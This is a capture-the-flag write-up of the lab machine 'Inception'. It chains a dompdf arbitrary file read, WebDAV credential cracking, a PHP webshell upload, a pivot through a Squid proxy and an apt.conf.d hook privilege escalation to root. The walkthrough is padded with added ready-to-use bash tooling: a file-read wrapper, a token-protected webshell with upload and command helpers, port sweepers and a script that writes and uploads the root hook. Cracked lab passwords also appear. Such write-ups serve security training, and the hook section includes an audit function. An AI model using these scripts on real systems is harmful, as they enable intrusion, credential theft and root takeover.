Inception

Enumeration
As always, we start with the enumeration phase, in which we scan the machine for open ports and identify the services and versions running behind them.
The following nmap command scans the whole port range quickly and saves the output to a file:
nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.67 -oN allPorts
-sS: TCP SYN scan. Relatively unobtrusive and stealthy, since it never completes a TCP connection.
--min-rate 5000: keep the sending rate at or above 5000 packets per second.
-p-: scan the entire port range, from 1 to 65535.
-T5: insane timing template, the fastest one nmap offers.
-Pn: skip host discovery and assume the host is online.
-n: no reverse DNS resolution.
-oN allPorts: save the output in normal format to the allPorts file.
Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:
nmap -sC -sV -p80,3128 10.10.10.67 -oN targeted
-sC: run the default set of NSE scripts.
-sV: enable service and version detection.
-oN targeted: save the output in normal format to the targeted file.
The website doesn't show anything interesting.

But a comment at the bottom of the page source mentions dompdf.
If we go to /dompdf, we'll see that directory listing is enabled and we'll be able to see some files.

Exploitation
dompdf is affected by an arbitrary file read vulnerability: the input_file parameter accepts PHP stream wrappers, so a php://filter wrapper lets us read local files. The file content ends up base64-encoded inside the generated PDF, so we extract the last parenthesised text literal from the PDF and decode it.
curl -s "http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd" | grep -oP '\(.*?\)' | tail -n 1 | tr -d "()" | base64 -d
There is a user called cobb. We can read other files the same way, for example the Apache2 site configuration:
curl -s "http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/apache2/sites-enabled/000-default.conf" | grep -oP '\(.*?\)' | tail -n 1 | tr -d "()" | base64 -d
It defines a /webdav_test_inception subdirectory, which asks for credentials when we browse to it.

Note that the Apache2 configuration points to a password file for that location. It contains a hashed password for the webdav_tester user.
curl -s "http://10.10.10.67/dompdf/dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/var/www/html/webdav_test_inception/webdav.passwd" | grep -oP '\(.*?\)' | tail -n 1 | tr -d "()" | base64 -d
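Since we end up repeating the same curl pipeline for every file, here is a small wrapper, added as an example and not part of the original writeup. Only the target address and the /dompdf/dompdf.php path come from the box; the PDF fragment used for offline testing is constructed and is not real dompdf output.

```shell
#!/usr/bin/env bash
# Added example: reusable wrapper around the dompdf input_file file read.
# TARGET defaults to the writeup's box and can be overridden from the environment.
TARGET="${TARGET:-10.10.10.67}"

# dompdf renders the wrapped file into a PDF. Because php://filter base64-encodes
# it first, the whole file becomes one whitespace-free text literal "(....)" in
# the page stream. This reads the PDF on stdin, keeps the last parenthesised
# literal and decodes it. Being stdin-based, it can be tested without a target.
pdf_last_literal_b64d() {
    # -a: treat the (binary) PDF as text; in a basic regex the parentheses are literal.
    grep -ao '([^)]*)' | tail -n 1 | tr -d '()' | base64 -d
}

# Read an absolute path on the target through dompdf. curl -G with
# --data-urlencode builds the query string, so odd characters in the path survive.
dompdf_read() {   # dompdf_read /etc/passwd
    curl -s -G "http://$TARGET/dompdf/dompdf.php" \
        --data-urlencode "input_file=php://filter/read=convert.base64-encode/resource=$1" \
        | pdf_last_literal_b64d
}

# Constructed PDF fragment (not real dompdf output) with two text literals; the
# last one is the base64 of a one-line /etc/passwd. Used for offline testing.
SAMPLE_PDF='%PDF-1.7
BT /F1 12 Tf (Helvetica) Tj ET
BT (cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo=) Tj ET'

demo() {
    printf '%s\n' "$SAMPLE_PDF" | pdf_last_literal_b64d
}

# Usage: ./dompdf_read.sh /etc/passwd
if [ $# -gt 0 ]; then
    dompdf_read "$1"
fi
```

If the PDF's page stream is compressed (FlateDecode) the literal is not visible as text; in that case decompress the PDF first, for example with qpdf --qdf, before running the extraction.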
Put the hash in a file called hash and crack it with john:
john -w=/usr/share/wordlists/rockyou.txt hash
We get the password for webdav_tester. Browsing to the directory with these credentials still gives a forbidden message.

Let's use davtest to see what permissions we have on the WebDAV server.
davtest -url http://10.10.10.67/webdav_test_inception/ -auth webdav_tester:babygurl69
As we can see, PHP files can be uploaded and executed. Let's upload a PHP webshell. First, create it:
nano pwn.php
Then upload it with a PUT request (--data-binary sends the file unchanged, whereas -d would strip the newlines out of it):
curl -s -X PUT http://webdav_tester:babygurl69@10.10.10.67/webdav_test_inception/pwn.php --data-binary @pwn.php
Now we can run commands using the uploaded webshell.
http://10.10.10.67/webdav_test_inception/pwn.php?cmd=whoami
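The contents of pwn.php are not shown above, so here is a version added as an example (not the writeup's own file). It adds a token check so that nobody else who finds the file on the target can use it, and wraps the upload and the command execution in functions. The target, share and webdav_tester credentials are the ones from the box; the token value is made up, and the PHP side assumes PHP 5.6 or newer for hash_equals().

```shell
#!/usr/bin/env bash
# Added example: a minimal token-protected PHP webshell, its WebDAV upload, and
# a helper that runs commands through it with proper URL encoding.
TARGET="${TARGET:-10.10.10.67}"
SHARE="webdav_test_inception"
CREDS="webdav_tester:babygurl69"
TOKEN="${TOKEN:-6fd1a8c3}"   # constructed value; pick your own per engagement

# Write the webshell to $1. Requests without the right token get a 404, so the
# file looks like nothing to anyone else; hash_equals() compares in constant time.
make_webshell() {   # make_webshell pwn.php
    cat > "$1" <<EOF
<?php
if (!isset(\$_GET['k']) || !hash_equals('$TOKEN', \$_GET['k'])) { http_response_code(404); exit; }
header('Content-Type: text/plain');
system(\$_GET['cmd']);
EOF
}

# Upload with PUT and print the HTTP status. --data-binary keeps the file byte
# for byte; -d would strip newlines from a multi-line script.
upload_webshell() {   # upload_webshell pwn.php
    curl -s -o /dev/null -w '%{http_code}\n' -X PUT \
        -u "$CREDS" --data-binary "@$1" \
        "http://$TARGET/$SHARE/$(basename "$1")"
}

# Run a command. -G --data-urlencode encodes spaces and special characters, so
# "ws ls -la /var/www/html" works from a terminal, not only from a browser.
ws() {   # ws whoami
    curl -s -G "http://$TARGET/$SHARE/pwn.php" \
        --data-urlencode "k=$TOKEN" --data-urlencode "cmd=$*"
}

# Usage: make_webshell pwn.php && upload_webshell pwn.php && ws whoami
```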
We won't be able to get a reverse shell because a firewall blocks outbound connections, so we keep enumerating the server through the webshell. Listing /var/www/html reveals another directory called wordpress_4.8.3.
http://10.10.10.67/webdav_test_inception/pwn.php?cmd=ls -la /var/www/html
Which has common WordPress files.
http://10.10.10.67/webdav_test_inception/pwn.php?cmd=ls -la /var/www/html/wordpress_4.8.3
The wp-config.php file contains credentials for the database.
view-source:http://10.10.10.67/webdav_test_inception/pwn.php?cmd=cat /var/www/html/wordpress_4.8.3/wp-config.php
(view-source: makes the browser show the raw output; otherwise it would treat the <?php ... ?> block as markup and hide it.)
Port 3128 was also open, running a Squid proxy. Requesting localhost through that proxy (curl's -x option) shows that port 80 is reachable from the inside:
curl -s -x http://10.10.10.67:3128 http://localhost | html2text
But other ports may be open internally. Let's use wfuzz to find out, hiding the 503 responses Squid returns for ports it cannot connect to:
wfuzz -c --hc=503 -t 200 -z range,1-65535 -p 10.10.10.67:3128:HTTP http://127.0.0.1:FUZZ
Port 22 is also open. We could try to log in as cobb with the database password we found in wp-config.php. To reach port 22 through the Squid proxy, add it to the proxychains configuration file:
nano /etc/proxychains.conf
Now we can log in via SSH as cobb and grab the user flag:
proxychains -q sshpass -p 'VwPddNh7xMZyDQoByQL4' ssh cobb@localhost
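As an added example (not part of the original writeup), the same pivot done with curl and a private proxychains config: a port sweep of the target's loopback interface through Squid, which is what the wfuzz command above does, and the [ProxyList] entry needed to reach whatever it finds. Only the proxy address comes from the box; the config file name is an assumption.

```shell
#!/usr/bin/env bash
# Added example: loopback port sweep through a Squid proxy plus a proxychains config.
PROXY="${PROXY:-http://10.10.10.67:3128}"

# Ask Squid to fetch http://HOST:PORT/ for each port. Squid answers 503 when the
# upstream connection is refused, so any other code means something accepted the
# connection. The code alone does not identify the service: a non-HTTP listener
# such as SSH usually shows up as some other 5xx because Squid cannot parse its
# banner, and a 403 means a Squid ACL refused the port before even trying.
# Treat non-503 hits as leads to verify, not as confirmed services.
squid_sweep() {   # squid_sweep 127.0.0.1 1 1024
    local host=$1 port code
    for port in $(seq "$2" "$3"); do
        code=$(curl -s -o /dev/null -w '%{http_code}' --max-time 5 \
                    -x "$PROXY" "http://$host:$port/")
        if [ "$code" != "503" ]; then
            printf '%s:%s -> HTTP %s\n' "$host" "$port" "$code"
        fi
    done
}

# proxychains needs the HTTP proxy in its [ProxyList]. Writing a private config
# to $1 (used with proxychains -f FILE) leaves /etc/proxychains.conf untouched.
write_proxychains_conf() {   # write_proxychains_conf pc.conf
    local hostport=${PROXY#http://}
    cat > "$1" <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
http ${hostport%:*} ${hostport##*:}
EOF
}

# Usage:
#   squid_sweep 127.0.0.1 1 1024
#   write_proxychains_conf pc.conf && proxychains -q -f pc.conf ssh cobb@127.0.0.1
```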
Privilege Escalation
We are currently in a container: the machine has the 192.168.0.10 IP address.
ip a
Let's use my tool bnmap to do host and port discovery on this network. Since the firewall blocks connections, we can't download it onto the box; instead, base64 encode the script and copy it to the clipboard:
cat bnmap.sh | base64 -w 0 | xclip -sel clip
Then paste and decode it on the server:
echo 'IyEvY...biIK' | base64 -d > bnmap.sh
Now, use the tool to scan the entire eth0 network interface.
bash bnmap.sh -i eth0
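bnmap.sh itself is not reproduced here. The following is an added example, not the author's tool, of the technique such a script relies on: a host and port sweep that needs nothing but bash's /dev/tcp redirection and coreutils' timeout, so it can be pasted over an SSH session exactly as described above. It assumes the 192.168.0.0/24 network from the box and a bash on the target (/dev/tcp is a bash feature, not POSIX sh).

```shell
#!/usr/bin/env bash
# Added example: bash-only host and port discovery for pivots where nothing
# can be downloaded. Not the writeup's bnmap.sh.
TIMEOUT="${TIMEOUT:-1}"

# Returns 0 if HOST:PORT accepts a TCP connection. The connect runs in a child
# bash under timeout, so a filtered port costs at most $TIMEOUT seconds
# instead of hanging the sweep.
tcp_open() {   # tcp_open 192.168.0.1 22
    timeout "$TIMEOUT" bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null
}

# Host discovery without ICMP: a host is reported if any of a few common ports
# accepts a connection. A refused connection would also prove the host is up,
# but the redirection only reports success or failure, so hosts whose listed
# ports are all closed or filtered are missed.
sweep_hosts() {   # sweep_hosts 192.168.0
    local i p
    for i in $(seq 1 254); do
        for p in 21 22 53 80 443 3128; do
            if tcp_open "$1.$i" "$p"; then
                echo "$1.$i"
                break
            fi
        done
    done
}

# Port sweep of one host, printing the ports that accepted a connection.
sweep_ports() {   # sweep_ports 192.168.0.1 1 1024
    local p
    for p in $(seq "$2" "$3"); do
        tcp_open "$1" "$p" && echo "$p"
    done
    return 0
}

# Transfer it the same way as bnmap.sh: on the attacker
#   base64 -w 0 sweep.sh | xclip -sel clip
# and on the target
#   echo '<pasted base64>' | base64 -d > sweep.sh
# Usage: sweep_hosts 192.168.0 ; sweep_ports 192.168.0.1 1 1024
```

Sequential connects with a one-second timeout are slow over a full /24 and 65535 ports; on a box that has nothing else, that is the trade-off, and narrowing the port list to what the environment is likely to run (as the writeup's 21, 22 and 53 suggest) keeps it practical.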
There is one host, 192.168.0.1, with ports 21, 22 and 53 open. Let's try SSH with the same credentials for cobb:
ssh cobb@192.168.0.1
Now we have access to the main machine. Checking the cron jobs, we see that root updates the system every 5 minutes:
cat /etc/crontab
If we can create files in /etc/apt/apt.conf.d/, we have a way to become root: apt reads every file in that directory, and a hook defined there runs as root on the next update. Let's create the malicious file with the following payload:
nano pwned
Uploading the malicious file over FTP doesn't work:
ftp localhost
But TFTP does:
tftp localhost
The file was created successfully:
ls -l /etc/apt/apt.conf.d/
Now we wait for the cron job to run. Afterwards /bin/bash has the SUID bit set, so bash -p gives us a root shell, and all that is left is to reap the harvest and take the root flag.
bash -p
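The payload file is not shown above, so here is an added example of what such an apt.conf.d hook looks like, together with the TFTP upload and an audit function for finding hooks like it afterwards (when cleaning up, or as a defender). None of this is the writeup's own "pwned" file. It assumes what the text describes: a writable /etc/apt/apt.conf.d, a root cron job running apt, and a TFTP server that serves / and allows creating new files. The hook file name is made up.

```shell
#!/usr/bin/env bash
# Added example: apt.conf.d hook for the cron-driven privilege escalation,
# its TFTP upload, and an audit for such hooks.
HOOK_NAME="00-pwned"   # constructed name

# APT evaluates every file in apt.conf.d before a run, and APT::Update::Pre-Invoke
# commands execute as the user running apt, here root via cron. chmod u+s on
# /bin/bash makes "bash -p" a root shell for anyone.
write_hook() {   # write_hook /tmp
    cat > "$1/$HOOK_NAME" <<'EOF'
APT::Update::Pre-Invoke {"chmod u+s /bin/bash";};
EOF
}

# Upload the hook through TFTP. The tftp client reads its commands from stdin,
# so the put can be scripted instead of typed at the prompt.
tftp_put_hook() {   # tftp_put_hook localhost /tmp/00-pwned
    tftp "$1" <<EOF
put $2 /etc/apt/apt.conf.d/$HOOK_NAME
quit
EOF
}

# Audit: list apt.conf.d entries that register Pre-/Post-Invoke or Pre-Install
# commands, as file:line:content. Distributions ship legitimate hooks, so review
# each hit; one that touches /bin/bash, /etc/sudoers or a user's keys is a red flag.
# Returns 0 if anything matched, 1 otherwise (grep's own exit status).
audit_apt_hooks() {   # audit_apt_hooks /etc/apt/apt.conf.d
    grep -nE '(APT|DPkg)::[A-Za-z:-]*(Pre|Post)-(Invoke|Install)' "$1"/* 2>/dev/null
}

# Usage:
#   write_hook /tmp && tftp_put_hook localhost /tmp/00-pwned
#   ls -l /etc/apt/apt.conf.d/      # then wait for cron and run: bash -p
#   audit_apt_hooks /etc/apt/apt.conf.d
```

The audit is also the fix: a writable /etc/apt/apt.conf.d (or a TFTP daemon that can write anywhere on the filesystem) is the actual weakness here, and the hook file is the thing to look for once you suspect it has been abused.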